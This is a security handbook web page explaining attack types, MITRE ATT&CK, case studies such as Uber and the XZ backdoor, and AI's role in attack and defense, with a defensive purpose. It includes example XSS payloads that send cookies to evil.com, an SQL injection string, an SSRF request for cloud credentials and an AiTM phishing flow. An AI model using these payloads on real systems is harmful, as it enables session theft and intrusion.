SEC

Security Concepts Handbook

Security
Attack & Defense

// "Think like an attacker. Defend like an engineer. Act like it's already compromised."

A comprehensive field guide to security fundamentals — how attacks work, the mindset behind them, real-world case studies including Uber, XZ backdoor, Scattered Spider, and how AI reshapes both offense and defense. Built for engineers who want to understand the full picture.

Attack Types Case Studies Threat Intel Defense Live CVEs AI & Security Tools

What Is Security?

// THE CIA TRIAD & FOUNDATIONAL CONCEPTS

Security is the practice of protecting systems, data, and people from unauthorized access, damage, or disruption. It is not a product you buy — it is a continuous process. The moment you think you are "secure," you have already lost. Attackers need to succeed only once; defenders need to succeed every time.

Confidentiality

Only authorized parties can read the data. Implemented via encryption, access controls, and data classification. Violated by: data breaches, eavesdropping, credential theft.

Integrity

Data has not been tampered with. Implemented via hashing, digital signatures, and audit logs. Violated by: MITM attacks, SQL injection, unauthorized modifications.

Availability

Systems are accessible when needed. Implemented via redundancy, DDoS protection, backups. Violated by: ransomware, DDoS, hardware failure, sabotage.

≠

Security ≠ Compliance

Passing a SOC 2 audit does not make you secure. Compliance is a minimum bar, not a destination. A company can be fully compliant and still get breached.

∞

Attack Surface

Every system, service, API, employee, vendor, and code dependency is a potential entry point. The attack surface grows every time you ship a feature.

Zero Trust

Assume every request is hostile. Never trust a request based on network location. Verify every user, device, and service explicitly — every time.

The Security Terminology You Must Know

Term	Definition	Example
Vulnerability	A weakness in a system that could be exploited	Unpatched Log4Shell in a Java app
Exploit	Code or technique that takes advantage of a vulnerability	Python script triggering Log4Shell RCE
Threat	Any potential danger that could exploit a vulnerability	Nation-state APT group targeting your sector
Risk	Probability × Impact of a threat exploiting a vulnerability	Critical CVE on internet-facing server = High Risk
IOC	Indicator of Compromise — evidence a breach occurred	Suspicious IP in logs, malware hash, odd registry key
TTP	Tactics, Techniques, Procedures — how attackers operate	Phishing → credential harvest → lateral move → data exfil
CVE	Common Vulnerabilities and Exposures — standardized vuln ID	CVE-2024-3094 (XZ Utils backdoor, CVSS 10.0)
CVSS	Score 0–10 measuring vulnerability severity	9.8 = critical, 0–3.9 = low
APT	Advanced Persistent Threat — sophisticated, long-term attacker	Lazarus Group (North Korea), Cozy Bear (Russia)
Zero-Day	Unknown vulnerability with no patch available	Vendor doesn't know it exists yet — weaponized in the wild

The Attacker Mindset

// HOW ADVERSARIES THINK

The most important shift in security thinking is to understand how attackers see your systems. They do not see your architecture diagram — they see an attack surface. They are patient, creative, and motivated. Understanding their incentives, methods, and economics is the foundation of effective defense.

Attacker Motivations

Financial Most Common

Ransomware — encrypt data, demand payment
Business Email Compromise (BEC) — wire fraud
Credential theft for account takeover
Cryptojacking — steal compute for crypto mining
Data theft for resale on dark web

Espionage Nation-State

Intellectual property theft (trade secrets, R&D)
Government/military intelligence gathering
Pre-positioning for future disruption
Influencing elections via disinformation
Long dwell time — months or years undetected

Hacktivism Ideological

Website defacement for political messaging
DDoS to disrupt services of opposing org
Leaking internal documents (e.g. Anonymous)
Targeting specific companies for ethical reasons

Disruption War/Terror

Critical infrastructure attacks (power, water)
Wiper malware (destroy, not encrypt)
NotPetya — caused $10B in damage
Russian attacks on Ukraine infrastructure

How Attackers Think: The OODA Loop

Phase 1

Observe

→

Phase 2

Orient

→

Phase 3

Decide

→

Phase 4

Act

→

Loop

Repeat

Attackers observe your environment — scanning IPs, browsing job postings (which reveal your tech stack), searching GitHub for leaked secrets, reading your documentation. They orient based on what they find — identifying the weakest link. They decide on an attack vector and act. Then they loop — persistence, lateral movement, exfiltration.

⚠

Asymmetric Warfare: Attackers need to find one way in. You need to defend everything. They can spend weeks on a single target. Your team has hundreds of systems to manage. The economics always favor the attacker — which is why layered defense, detection, and rapid response matter more than trying to block every possible attack.

Attacker Economics

Cost of Attack

Phishing kit: $20–200. Ransomware-as-a-Service subscription: $100–300/month. Exploit broker for zero-day: $50K–$2M. State-sponsored: unlimited budget. The barrier to entry for basic attacks is near-zero.

Revenue of Crime

Average ransomware payment (2024): $2.73M. BEC fraud (2024): $2.9B lost. Dark web credential dumps: $0.50–$100 per account. Stolen CC data: $5–$50 per card. This is a multi-billion dollar criminal industry.

Opportunity Cost

If a target is too hard, attackers move to the next. Security ROI: being harder to breach than your peers is often enough. Attackers are economically rational — they go for low-hanging fruit first.

The Attack Lifecycle

// CYBER KILL CHAIN & MITRE ATT&CK

Every cyberattack follows a recognizable pattern. The Cyber Kill Chain (Lockheed Martin) and MITRE ATT&CK framework both model this lifecycle. Understanding it allows defenders to detect and interrupt attacks at any stage — not just at the perimeter.

1 Recon

Gather Intel

→

2 Weapon

Build Payload

→

3 Delivery

Send to Target

→

4 Exploit

Trigger Vuln

→

5 Install

Plant Backdoor

→

6 C2

Phone Home

→

7 Actions

Achieve Goal

MITRE ATT&CK — The Attacker's Playbook

MITRE ATT&CK is a globally accessible knowledge base of adversary tactics and techniques based on real-world observations. It is used to map detections, identify coverage gaps, and build threat models. Every mature SOC aligns detections to ATT&CK technique IDs.

MITRE Tactic	What Attackers Do	Example Techniques	Detection Opportunity
Reconnaissance	Research target before attacking	DNS recon, LinkedIn scraping, Shodan scanning	Honeypots, exposed-service monitoring
Initial Access	First foothold in environment	Phishing, valid accounts, supply chain, zero-day	Email gateway, auth anomaly detection
Execution	Run malicious code	PowerShell, WMI, macro documents	Process creation events (Sysmon/EDR)
Persistence	Maintain access after reboot	Registry run keys, scheduled tasks, backdoors	Registry/cron monitoring, new service detection
Privilege Escalation	Get admin/root access	Kernel exploits, token impersonation, sudo abuse	Privilege use anomalies, EDR telemetry
Defense Evasion	Hide from security tools	Log clearing, process injection, LOLBAS	Log deletion events, unsigned binary execution
Credential Access	Steal passwords and tokens	Mimikatz, Kerberoasting, LSASS dump	LSASS access alerts, DCSync detection
Lateral Movement	Spread through the network	PtH, PtT, RDP, SMB, WMI	East-west traffic analysis, micro-segmentation
Exfiltration	Steal data	DNS tunneling, HTTPS to C2, USB, cloud storage	DLP, unusual egress volume, DNS anomalies
Impact	Achieve final objective	Ransomware, wiper, BEC wire fraud, defacement	File encryption alerts, bulk-delete events

▸

ATT&CK Navigator: Use attack.mitre.org to visualize your detection coverage. Map your SIEM rules to ATT&CK IDs. Every technique without a detection is a blind spot. Defenders that think in ATT&CK terms catch attackers much earlier in the kill chain.

Social Engineering

// THE HUMAN IS THE VULNERABILITY

Social engineering is the art of manipulating humans rather than machines. It bypasses technical controls entirely. No firewall blocks a phone call. No IDS detects a convincing email. The most sophisticated technical infrastructure can be undone by a single employee clicking a link or reading a password over the phone. 81% of breaches involve human error or stolen credentials (Verizon DBIR 2024).

Phishing Most Common

How: Attacker crafts a convincing email impersonating a trusted entity (bank, IT department, CEO, DocuSign). Contains a link to a fake login page or a malware attachment.

Variants:

Spear phishing — targeted at specific individual, highly personalized
Whaling — targets C-suite executives
Vishing — voice phishing (phone calls)
Smishing — SMS phishing
AiTM Phishing — Adversary-in-the-Middle, can steal MFA tokens in real time

Pretexting High Success

How: Attacker creates a fabricated scenario (pretext) to manipulate the target. Examples: impersonating IT support to get credentials, pretending to be a vendor to get building access, posing as an auditor to gain document access.

Real example: Scattered Spider (2025) called Marks & Spencer's IT helpdesk, impersonated employees, and convinced support staff to bypass security controls — leading to a £300M+ business disruption.

Baiting & Physical

USB drops — leave infected USB drives in parking lots
Tailgating — follow an authorized person through a door
Quid pro quo — offer something (fake IT help) for something (credentials)
Watering hole — compromise a website your targets frequently visit

Business Email Compromise

How: Attacker compromises or spoofs an executive's email account and instructs finance to wire funds. $2.9B lost to BEC in 2023 (FBI IC3). No malware involved — just a convincing email.

Key signal: Urgent wire transfer request from "CEO" with slightly different email domain.

How AiTM Phishing Actually Works (Technical)

Attack Flow — Evilginx / Modlishka (AiTM)
# Adversary-in-the-Middle Attack — bypasses TOTP/Push MFA in real time

# 1. Setup: Attacker deploys a reverse proxy mimicking the real login page
Attacker → sets up phishingdomain.com → proxies all requests to real login.company.com
Victim sees: https://login-company-secure.com (looks identical to real site)

# 2. Delivery: Target receives convincing phishing email
Subject: "Urgent: Your account will be locked in 24 hours"
Body:    "Click here to verify: https://login-company-secure.com"

# 3. Victim enters credentials + MFA code
Victim → types username + password → proxy relays to REAL site
Real site → sends MFA challenge → victim enters OTP code
Proxy → relays OTP to real site IN REAL TIME → authentication succeeds
Proxy → captures the session token (cookie) issued by the real site

# 4. Attacker now has a valid, authenticated session token
# MFA was bypassed entirely — it was completed by the victim
# Works against: SMS OTP, TOTP apps (Google Auth), plain push notifications
# Does NOT work against: FIDO2/Passkeys (origin-bound - tied to real domain)

# Tools used: Evilginx3, Modlishka, Muraena (open source)
# Detection: Watch for auth from unexpected IP/country after successful MFA

⚠

SMS and TOTP MFA are NOT phishing-resistant. AiTM attacks defeat them in real time. The only phishing-resistant MFA is FIDO2/Passkeys — they are cryptographically bound to the origin domain, so even a convincing fake site cannot capture usable credentials. Mandate passkeys for privileged access.

Network Attacks

// PACKETS DON'T LIE — BUT ATTACKERS DO

Network attacks target the infrastructure over which data travels — intercepting, disrupting, or rerouting traffic. While encryption has mitigated many classical network attacks, misconfigurations, legacy protocols, and new attack surfaces keep this category highly relevant.

MITM — Man-in-the-Middle Classic

Attacker positions between two communicating parties, secretly intercepting and potentially modifying traffic. Enabled by: ARP poisoning, DNS spoofing, rogue WiFi, SSL stripping.

Defence: TLS everywhere, HSTS preloading, certificate pinning, DNSSEC, avoid public WiFi without VPN.

DDoS — Distributed Denial of Service Growing

Flood a target with traffic to make it unavailable. Modern DDoS leverages botnets (IoT devices), amplification (DNS, NTP, SSDP — small request → giant response), and application-layer attacks (HTTP flood).

Record: Google mitigated a 398 Tbps DDoS in 2023. UNFI food supply chain disrupted by DDoS in June 2025.

Port Scanning & Recon

Using tools like nmap, Shodan, or Masscan to enumerate open ports and services. Every internet-exposed service that shouldn't be public is a vulnerability waiting to be exploited.

Shodan query: product:"Microsoft IIS" country:"IN" — attackers find your exposed services before you do.

DNS Hijacking & Tunneling

Hijacking: Redirect DNS queries to attacker-controlled servers — users go to fake sites even with correct URL. Tunneling: Encode data in DNS queries to exfiltrate data bypassing firewalls (DNS is usually allowed outbound).

Network Scanning Demo (Defense Perspective)

bash — reconnaissance tools defenders use
# See your network like an attacker sees it

# Scan your own perimeter
nmap -sV -p- --open --min-rate 1000 your-public-ip-range/24

# Find services exposed to internet (Shodan CLI)
shodan search 'org:"Your Company Name"' --fields ip_str,port,data

# Check for open S3 buckets (common data leak)
aws s3api list-buckets | jq '.Buckets[].Name' | \
  xargs -I{} sh -c 'aws s3api get-bucket-acl --bucket {} 2>&1 | grep -i public && echo "PUBLIC: {}"'

# Check DNS zone for unnecessary exposure
dig +short your-domain.com ANY
dig axfr your-domain.com @ns1.your-domain.com

# Detect DNS tunneling (look for unusually large/frequent DNS queries)
zeek -r capture.pcap dns_query_reply.log
awk '{if(length($6) > 100) print "Suspicious DNS:", $6}' dns_query_reply.log

Web Application Attacks

// OWASP TOP 10 & HOW THEY WORK

Web applications are the most common attack surface. Nearly every business runs web services, and many expose sensitive data via poorly secured APIs. The OWASP Top 10 defines the most critical categories — not because they are the only threats, but because they are the most frequently exploited.

A10 SSRF

A09 Logging Fail

A06 Vuln Components

A05 Misconfig

A03 Injection

A02 Crypto Fail

A01 Broken Auth / Access

SQL Injection Classic, Still Rampant

User input is unsanitized and included directly in a database query. Attacker crafts input that changes the query logic.

SQL Injection Example
# Vulnerable query
query = "SELECT * FROM users WHERE name = '" + userInput + "'"

# Attacker input: ' OR '1'='1
# Resulting query — returns ALL users
SELECT * FROM users WHERE name = '' OR '1'='1'

# Fix: Use parameterized queries ALWAYS
cursor.execute("SELECT * FROM users WHERE name = %s", (userInput,))

XSS — Cross-Site Scripting Very Common

Attacker injects malicious JavaScript into a web page that executes in victims' browsers. Used to steal session cookies, redirect users, or perform actions on their behalf.

XSS Payload
# Classic stored XSS — injected into comments/profile
<script>document.location='https://evil.com/steal?c='+document.cookie</script>

# DOM-based XSS via URL parameter
https://victim.com/search?q=<img src=x onerror=fetch('//evil.com/'+btoa(document.cookie))>

# Fix: Encode output, Content-Security-Policy, HttpOnly cookies

IDOR — Insecure Direct Object Reference

Application exposes direct references to internal objects without checking authorization. The #1 vulnerability category (OWASP A01 — Broken Access Control).

IDOR Example
# You log in as user 1001 and get your invoice:
GET /api/invoices/1001

# Change the ID — you now see another user's invoice:
GET /api/invoices/1000   # Works if no authz check!

# Fix: Always verify the requesting user OWNS the resource
if invoice.owner_id != current_user.id:
    raise PermissionDenied()

SSRF — Server-Side Request Forgery

Attacker tricks the server into making HTTP requests on their behalf — often to internal services or cloud metadata endpoints not accessible from outside.

SSRF Example — AWS Metadata
# App fetches URL provided by user:
GET /fetch?url=https://example.com/image.jpg

# Attacker provides internal URL:
GET /fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

# Server fetches it — returns AWS role credentials!
# Capital One breach (2019) — $80M fine — started with SSRF

Malware & Ransomware

// SOFTWARE DESIGNED TO CAUSE HARM

Malware (malicious software) is code designed to damage, disrupt, or gain unauthorized access to computer systems. Ransomware — malware that encrypts data and demands payment — has become the dominant threat to organizations, with average payments exceeding $2.7M in 2024 and 44% of all breaches now involving ransomware.

Type	What It Does	Famous Example	Defense
Ransomware	Encrypts files, demands payment for decryption key	LockBit, Cl0p, ALPHV/BlackCat	Air-gapped backups, EDR, network segmentation
Wiper	Permanently destroys data — no decryption option	NotPetya (2017), Industroyer (Ukraine)	Immutable backups, network segmentation
Trojan	Disguised as legitimate software, installs backdoor	DarkComet, Cobalt Strike (misused)	Application allowlisting, EDR
RAT	Remote Access Trojan — gives attacker full control	AsyncRAT, Quasar, njRAT	Network monitoring, process anomaly detection
Rootkit	Hides deep in OS, survives reboots and evades AV	Necurs, Sony rootkit	Secure boot, integrity monitoring, reimaging
Cryptojacker	Silently mines cryptocurrency using your compute	XMRig deployed via Log4Shell	Anomalous CPU/GPU monitoring, container security
Infostealer	Silently harvests passwords, cookies, crypto wallets	RedLine, Vidar, Lumma Stealer	EDR, browser extension controls, phishing filters

Ransomware-as-a-Service (RaaS) Model

Operator

Builds & Maintains Ransomware

→

Portal

Dark Web Affiliate Portal

→

Affiliate

Rents Access (20–30%)

→

Compromise

Deploys Ransomware

→

Ransom

Victim Pays Crypto

→

Split

80% Affiliate / 20% Operator

⚠

Double Extortion: Modern ransomware operators don't just encrypt — they exfiltrate data first, then threaten to publish it on their leak sites if ransom is not paid. Even with good backups, the threat of data exposure creates additional pressure. This is now standard practice for LockBit, ALPHV, and Cl0p.

Supply Chain Attacks

// YOUR WEAKEST LINK IS YOUR VENDOR

Supply chain attacks compromise software or hardware before it reaches the victim, abusing the implicit trust organizations place in third-party vendors. They are among the most impactful and hardest to detect attacks because the malicious code arrives via a trusted channel.

Software Supply Chain Critical Risk

SolarWinds (2020): Russians embedded backdoor in Orion updates — 18,000 orgs affected including US Treasury
XZ Utils (2024): State-sponsored actor spent 2+ years building maintainer trust, then added SSH backdoor
Codecov (2021): Bash uploader script compromised — exfiltrated CI environment variables from 29,000 clients
npm typosquatting: Malicious packages with names similar to popular ones (e.g. lo-dash vs lodash)

Third-Party Vendor Risk Growing

MOVEit (2023): Zero-day in file transfer software — Cl0p ransomware exfiltrated data from 2,000+ orgs
Target (2013): Attackers got into Target's network via an HVAC vendor's credentials
Salesforce/Gainsight (2025): OAuth integration exploited to access data from 200+ companies
30% of all breaches in 2025 involved third-party or supply chain failures

Defending Against Supply Chain Attacks

Supply Chain Security Controls
# 1. Generate and track SBOMs (Software Bill of Materials)
syft myapp:latest -o spdx-json > sbom.json
# Know EVERY dependency and transitive dependency

# 2. Pin dependency versions — never use wildcards in production
# Bad:  requests>=2.0
# Good: requests==2.31.0

# 3. Verify package integrity with checksums
pip install --require-hashes -r requirements.txt
# requirements.txt includes sha256 hash of each package

# 4. Sign and verify artifacts (Sigstore / Cosign)
cosign sign --key cosign.key my-image:latest
cosign verify --key cosign.pub my-image:latest

# 5. Scan for known malicious packages
pip-audit --fix
npm audit --fix
trivy fs . --scanners vuln,secret,config

# 6. Monitor OSS maintainer changes
# New maintainer added to critical package = red flag
# Use OpenSSF Scorecard to assess package health
scorecard --repo github.com/owner/package

Credential Attacks

// YOUR PASSWORDS ARE THE MASTER KEY

Credentials are the single most targeted asset in cyberattacks. Stolen or weak credentials were involved in 81% of breaches (Verizon DBIR 2024). Attackers don't "hack in" — they log in. With 16 billion leaked credentials circulating on dark web markets in 2025, credential-based attacks are at an all-time high.

Password Attacks

Brute force: Try every possible combination (automated, fast)
Dictionary attack: Try common words and known passwords
Password spraying: Try one common password against many accounts (evades lockout)
Credential stuffing: Use breached username/password combos from other sites
Rainbow tables: Pre-computed hash tables to reverse unsalted hashes

In-Memory Credential Theft

Mimikatz: Dumps plaintext passwords from Windows LSASS memory
Pass-the-Hash (PtH): Use captured NTLM hash without cracking
Pass-the-Ticket (PtT): Use stolen Kerberos tickets
Kerberoasting: Request service tickets and crack them offline
DCSync: Pretend to be a DC and replicate all password hashes

▸

Check if you're already breached: Use haveibeenpwned.com to check if your email/domain appears in known data breaches. The HaveIBeenPwned API can be integrated into your HR offboarding and new-hire processes to flag compromised passwords on day 1.

Insider Threats

// THE ENEMY WITHIN

Insider threats come from people who already have authorized access — employees, contractors, partners. They are the hardest to detect because their initial access is legitimate. Insider threats cost 3× more on average than external breaches ($15.38M per incident, Ponemon 2022).

Malicious Insider

Intentionally steals data, sabotages systems, or sells access. Often motivated by financial gain, grudge, or recruitment by competitors/foreign actors.

Example: Coupang breach (Dec 2025) — former employee suspected of selling 33.7M customer records.

Negligent Insider

Causes breaches through carelessness — clicking phishing links, misconfiguring S3 buckets, using weak passwords, sharing credentials. Not malicious, but costly.

Example: Samsung employees pasting source code into ChatGPT in 2023, leaking confidential code.

Compromised Insider

Legitimate account taken over by an external attacker via phishing, credential theft, or malware. Attacker operates under the victim's identity and privileges.

Most common: Phished VPN credentials → attacker logs in as employee → accesses internal systems.

Case Study: Uber (2022)

// SOCIAL ENGINEERING + MFA FATIGUE = FULL COMPROMISE

The 2022 Uber breach is a masterclass in social engineering combined with MFA fatigue. A teenager-level attacker with no zero-days achieved full admin access to Uber's internal systems in hours, demonstrating that technical controls mean nothing if human factors are ignored.

Initial Compromise

Credential Purchase on Dark Web

Attacker purchased an Uber contractor's credentials from a dark web marketplace. Credential stuffing from previous breaches enabled access to contractor's personal accounts.

MFA Bypass

MFA Fatigue Attack

Attacker attempted login triggering MFA push notifications. When contractor repeatedly rejected, attacker sent a WhatsApp message claiming to be "Uber IT Support" and instructed the contractor to approve the push. After persistent attempts, the contractor approved. This is MFA fatigue/push bombing.

Lateral Movement

Finding Hardcoded Credentials

Once inside the contractor's VPN, attacker found a network share containing PowerShell scripts. These scripts had hardcoded admin credentials for Uber's Thycotic PAM system (privileged access manager). This is the cardinal sin of secrets management.

Full Compromise

Admin Access to Everything

With PAM admin access, the attacker accessed: AWS, GCP, Google Workspace, GitHub, HackerOne bug reports (including unpatched vulns), internal Slack, SentinelOne EDR console, and Uber's financial data. Posted to Uber's internal Slack: "I am a hacker and Uber has suffered a data breach."

Failures What Went Wrong

Simple push MFA — vulnerable to fatigue attacks
Admin credentials in plaintext on network share
VPN access = too much lateral movement possible
Contractor had access far beyond their role
No detection of credential-stuffing login attempts

Lessons Prevention

Mandate FIDO2/Passkeys for all employees (phishing-resistant)
Enable number matching on push MFA as minimum
Never store credentials in code, scripts, or shared drives
Use ZTNA — per-app access, not broad VPN access
Quarterly access reviews — remove excessive privileges

🔗

Reports: Uber's Official Statement · CSO Online Analysis · BleepingComputer Technical Breakdown

Case Study: XZ Utils Backdoor (2024)

// CVE-2024-3094 — THE MOST SOPHISTICATED OSS ATTACK EVER

The XZ Utils backdoor (CVE-2024-3094, CVSS 10.0) is arguably the most sophisticated software supply chain attack ever discovered. A threat actor (believed to be state-sponsored) spent over two years slowly building trust in the XZ open-source project, then inserted a backdoor that would have given them remote code execution on millions of Linux systems via OpenSSH.

💣

What made it extraordinary: The attacker (username "Jia Tan") didn't just write code — they built a social identity over 2+ years, contributed legitimate improvements, manipulated the original maintainer through psychological pressure, gained trust from the community, and finally inserted the backdoor hidden in a binary test file. It was caught only because a Microsoft engineer noticed SSH was 500ms slower than expected.

2021

"Jia Tan" Begins Contributing

A new contributor appears on the XZ mailing list. Makes small, legitimate bug fixes. Builds reputation slowly. Other sock-puppet accounts created to pressure the original maintainer (Lasse Collin) about "slow development pace."

2022–2023

Trust Building & Pressure Campaign

Jia Tan takes over more responsibilities. Fake community members pressure Lasse to hand over more control, claiming he is "burned out." Lasse eventually grants Jia Tan commit access. A long-game social engineering campaign against a single open-source maintainer.

Feb 2024

Backdoor Inserted (v5.6.0 & 5.6.1)

Malicious code hidden in binary test files (not in readable source). During build process, a script extracts and injects code that modifies the liblzma library. This library is used by systemd, which is linked to OpenSSH on Debian/Fedora systems. The backdoor allows anyone with a specific private key to authenticate and execute code via SSH — before authentication.

✓

March 29, 2024

Discovered by Andres Freund (Microsoft)

Andres noticed SSH logins were 500ms slower than expected on his Debian unstable system. This small performance anomaly led him down a rabbit hole that uncovered the backdoor. He disclosed to the Openwall mailing list. Patches shipped within hours. It was caught just before reaching stable distributions — had it shipped in Ubuntu LTS, millions of systems would have been backdoored.

Detection — Check if your system was affected
# Check XZ version (vulnerable: 5.6.0 or 5.6.1)
xz --version

# Binary detection via hexdump signature
path="$(ldd $(which sshd) | grep liblzma | grep -o '/[^ ]*')"
if hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410; then
    echo "VULNERABLE — backdoored liblzma detected!"
else
    echo "Not vulnerable"
fi

# Remediation: downgrade to < 5.6.0
sudo apt install xz-utils=5.4.4-1  # Debian/Ubuntu
sudo dnf downgrade xz              # Fedora/RHEL

🔗

Reports & Deep Dives: Official XZ Backdoor Page · Datadog Full Technical Analysis · JFrog Detector & Breakdown · CISA Advisory

Case Study: Scattered Spider 2025

// SOCIAL ENGINEERING HITS UK RETAIL

Scattered Spider (also known as UNC3944 or Octo Tempest) is a threat group known for aggressive social engineering. In Easter 2025, they compromised Marks & Spencer, the Co-op, and Harrods in a coordinated campaign — causing over £300M in business impact for M&S alone and weeks of online retail disruption.

Attack Method Social Engineering

Called IT helpdesk impersonating employees
Used personal information found on LinkedIn/social media to answer security questions
Convinced helpdesk to reset MFA on accounts
Gained access to identity provider (Okta/Azure AD)
From IdP — accessed everything: email, files, internal systems
Deployed ransomware after establishing persistence

Impact Massive

M&S: Online shopping disabled for 3+ weeks
Estimated £300M+ lost revenue for M&S
Co-op: Data stolen on 6.5 million members
Harrods: Systems disrupted during sale period
DragonForce ransomware deployed
No technical zero-days used — pure social engineering

💡

Key Lesson: Scattered Spider never needed to break through a firewall or exploit a vulnerability. They called a phone number and talked their way in. Your helpdesk is a critical security control. Implement identity verification for all helpdesk interactions — a shared secret, a hardware security key, or a video call with manager. Never reset MFA based on a phone call alone.

🔗

References: 2025 Cyber Attack Analysis · CISA Advisory on Scattered Spider TTPs

Case Study: ByBit Crypto Heist (2025)

// LAZARUS GROUP — $1.5 BILLION STOLEN

In February 2025, North Korea's Lazarus Group stole approximately $1.5 billion in Ethereum from ByBit exchange — the largest cryptocurrency theft in history. The attack exploited a vulnerability in a third-party wallet software provider, demonstrating the devastating reach of supply chain attacks into the financial sector.

Attack Vector Supply Chain

Lazarus compromised Safe (a multisig wallet software provider used by ByBit). They injected malicious JavaScript into Safe's signing interface. When ByBit's signers approved what appeared to be a legitimate transaction, the malicious code in the UI altered the destination address to Lazarus-controlled wallets.

The signers saw a legitimate transaction. The blockchain received a different one.

Scale & Laundering Nation-State

$1.5 billion Ethereum — largest crypto theft ever
Funds laundered through 5+ mixing services
Split into 50+ wallets within hours
Converted through decentralized exchanges (DEX)
Used to fund North Korea's weapons program
Lazarus attributed by FBI, Elliptic, and blockchain analytics

⚠

North Korea's Lazarus Group is responsible for over $3 billion in crypto theft since 2017. These funds directly finance the North Korean regime and its nuclear weapons program. This is state-sponsored cybercrime with geopolitical consequences — no "bug bounty" will bring these funds back. The ByBit attack shows that even air-gapped hardware wallets can be bypassed if the signing interface itself is compromised.

AI as the Attacker's Biggest Tool

// HOW GENERATIVE AI SUPERCHARGES ATTACKS

AI Threat Intelligence

Generative AI has fundamentally changed the economics and scale of cyberattacks. Tasks that previously required skilled, experienced attackers can now be automated, personalized at scale, and executed by anyone with a subscription. AI is not creating new attack categories — it is making existing attacks faster, cheaper, more convincing, and more accessible.

AI-Powered Attack Techniques

Hyper-Personalized Phishing Scaled

LLMs analyze LinkedIn, Twitter, company websites, and GitHub to generate highly personalized spear-phishing emails. Previously required hours per target; now: seconds per thousand targets. Quality dramatically higher than template-based phishing.

Example: AI-crafted email referencing your actual recent project, manager's name, and company's upcoming conference. Near-impossible to distinguish from legitimate email.

Deepfake Voice & Video Emerging

Voice cloning from 3-second audio samples. Video deepfakes of executives "approving" wire transfers. In 2024, a Hong Kong firm lost $25M when a finance employee was tricked by a deepfake video call impersonating the CFO. Vishing attacks powered by real-time voice cloning.

Tool: ElevenLabs, HeyGen, Synthesia (legitimate tools misused).

AI-Assisted Malware Development

AI helps write polymorphic malware that changes its signature to evade AV. Automates vulnerability discovery in open-source code. Generates exploit code from CVE descriptions. Translates attack techniques between programming languages. Debugs malware when it fails.

Reality: WormGPT and other uncensored LLMs specifically designed for cybercrime are sold on dark web forums.

Automated Vulnerability Discovery

AI models trained on CVEs, exploit databases, and source code can identify vulnerability patterns at scale. Google DeepMind's Project Zero uses AI for vuln research — and so do APT groups. AI can analyze millions of lines of code for injection points, logic flaws, and crypto weaknesses faster than human researchers.

Real-World AI Attack Scenarios (2024–2025)
# 1. CAMPAIGN SCALE
# Old: 1 analyst crafts 50 phishing emails/day
# New: AI pipeline generates 50,000 personalized emails/hour
#      Each references victim's employer, role, recent news, colleagues

# 2. DEEPFAKE BEC (Business Email Compromise)
# Attacker → clones CFO voice from YouTube earnings call
# Calls finance team: "Emergency wire transfer, I'm in a meeting, do it now"
# Real incident: $25M lost at Hong Kong firm (2024)

# 3. AI RECONAISSANCE
# AI agent browses target company's:
# - Job postings (reveals tech stack: "Must know AWS Lambda, Terraform, Okta")
# - GitHub (reveals code patterns, leaked secrets)
# - LinkedIn (org chart, employee movements)
# - Shodan (exposed services)
# Generates full attack plan in minutes

# 4. AUTOMATED EXPLOIT GENERATION
# CVE published → AI reads description → generates working PoC exploit
# Time from CVE publish to exploit: previously days/weeks, now: hours
# This is why patch SLAs have compressed dramatically

AI in Defense

// FIGHTING FIRE WITH FIRE

The same capabilities that power AI attacks are being deployed defensively. AI enables defenders to process telemetry at machine scale, detect anomalies that humans would miss in the noise, automate response, and identify vulnerabilities before attackers do.

Anomaly Detection at Scale High Value

ML models baseline "normal" behavior (user login times, data access patterns, network flows) and flag deviations. Detect: impossible travel, credential stuffing, data staging, lateral movement — in real time across millions of events per second.

Products: Microsoft Copilot for Security, Darktrace, CrowdStrike Charlotte AI, SentinelOne Purple AI, Google SecOps.

AI-Assisted Threat Hunting Emerging

Security analysts query their SIEM in natural language: "Show me all users who accessed sensitive data from a new IP in the last 7 days and had a failed MFA attempt first." AI translates to complex KQL/SPL, runs the query, and summarizes findings.

Shrinks required expertise: Tier-1 analysts can run Tier-3 investigations.

Automated Vulnerability Research

Google's Project Zero uses AI to find vulnerabilities in OSS at scale. OSS-Fuzz with ML guidance discovers memory-safety bugs. AI code review tools (Snyk DeepCode, GitHub Advanced Security) catch security flaws in PRs before merge.

In 2024: Google's Big Sleep AI agent discovered a stack buffer underflow in SQLite — before any human.

SOAR with LLM Integration

Security Orchestration, Automation, and Response (SOAR) platforms now use LLMs to generate incident summaries, suggest next steps, draft remediation runbooks, and even write correlation rules from natural language descriptions. Reduces analyst mean-time-to-respond.

▸

AI arms race reality: AI improves both offense and defense asymmetrically. Attackers benefit more from AI automation (scripting, scaling campaigns). Defenders benefit more from AI analysis (detecting patterns in massive telemetry). Net result: the quality bar for both attacks and defenses rises. Organizations that don't adopt AI-assisted detection will fall further behind.

Defender's Toolkit

// TOOLS EVERY SECURITY ENGINEER SHOULD KNOW

The security tooling landscape is vast. Below is a curated set organized by function — covering what attackers use to probe your systems, and what defenders use to protect, detect, and respond.

Red Team / Offensive (Know Your Enemy's Tools)

Tool	Purpose	Use Case
`nmap`	Network scanner	Port scanning, service enumeration, OS detection
`Burp Suite`	Web app proxy	Intercept, modify HTTP traffic; find web vulns
`Metasploit`	Exploit framework	Run exploits, generate payloads, post-exploitation
`Mimikatz`	Windows credential dumper	Extract NTLM hashes, Kerberos tickets from memory
`BloodHound`	AD attack path visualizer	Find shortest path to Domain Admin in Active Directory
`Impacket`	Python network protocols	SMB relay, Kerberoasting, DCSync, secretsdump
`Shodan`	Internet-facing asset search	Discover exposed services before attackers do
`Evilginx3`	AiTM phishing framework	Bypass MFA via reverse proxy phishing
`SQLmap`	SQL injection automation	Detect and exploit SQL injection vulnerabilities
`Nikto`	Web server scanner	Find server misconfigurations and known vulns

Blue Team / Defensive

Tool	Category	What It Does
`Wireshark`	Network Analysis	Deep packet inspection, protocol analysis, traffic forensics
`Sysmon`	Endpoint Telemetry	Windows process creation, network, registry events for SIEM
`Zeek`	Network Monitor	Protocol analysis, IDS, connection logging, threat hunting
`Snort / Suricata`	IDS/IPS	Signature-based intrusion detection and prevention
`YARA`	Malware Detection	Pattern-match rules to identify malware families
`Velociraptor`	DFIR	Remote forensics, endpoint monitoring, rapid IR collection
`Trivy`	Container/Code Scanning	CVE scanning for containers, IaC, code repositories
`gitleaks`	Secrets Detection	Scan git history and staged files for leaked secrets
`Semgrep`	SAST	Static analysis to find security bugs in code
